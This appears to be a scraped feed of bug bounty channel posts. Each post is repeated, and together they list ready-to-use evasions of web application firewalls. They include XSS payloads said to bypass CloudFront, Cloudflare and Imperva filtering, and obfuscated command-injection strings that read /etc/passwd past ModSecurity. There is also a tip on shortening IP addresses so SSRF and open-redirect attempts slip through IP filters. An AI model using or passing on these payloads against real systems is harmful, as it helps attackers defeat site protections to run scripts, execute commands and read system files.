CloudFront ~`XSS´ payload, shake dice.
🎲
<iframe srcdoc=<svg/onload=alert(1)>>
#BugBounty #BugBountyTip #WAF #infosec
🎲
<iframe srcdoc=<svg/onload=alert(1)>>
#BugBounty #BugBountyTip #WAF #infosec
Forwarded from امنیت اطلاعات
cloudflare «XSS» payload to bypass protection.
🦍
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
#BugBounty #BugBountyTip #WAF #infosec
@sec_nerd
🦍
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
#BugBounty #BugBountyTip #WAF #infosec
@sec_nerd
Forwarded from امنیت اطلاعات
Cloudflare XSS Bypass Payload
<svg%0Aonauxclick=0;[1].some(confirm)//
#Cloudflare #bugbounty #bugbountytips #WAF #Xss
<svg%0Aonauxclick=0;[1].some(confirm)//
#Cloudflare #bugbounty #bugbountytips #WAF #Xss
#WAF #ModSecurity #RCE #Payloads Detection #Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
#WAF #ModSecurity #RCE #Payloads Detection #Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
Bugbounty tips#3
Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked
Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked
Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
please note and share;
blocked:
onauxclick=confirm(2)
bypassed:
onauxclick=[2].some(confirm)
#XSS #WAF #WAFBypass #bugbountytips #security #infosec #hacking
blocked:
onauxclick=confirm(2)
bypassed:
onauxclick=[2].some(confirm)
#XSS #WAF #WAFBypass #bugbountytips #security #infosec #hacking
Imperva WAF Bypass for XSS;
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
- without parentheses, 'alert', 'document.domain' , 'window' , space
#BugBounty #BugBountyTip #WAF #infosec
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
- without parentheses, 'alert', 'document.domain' , 'window' , space
#BugBounty #BugBountyTip #WAF #infosec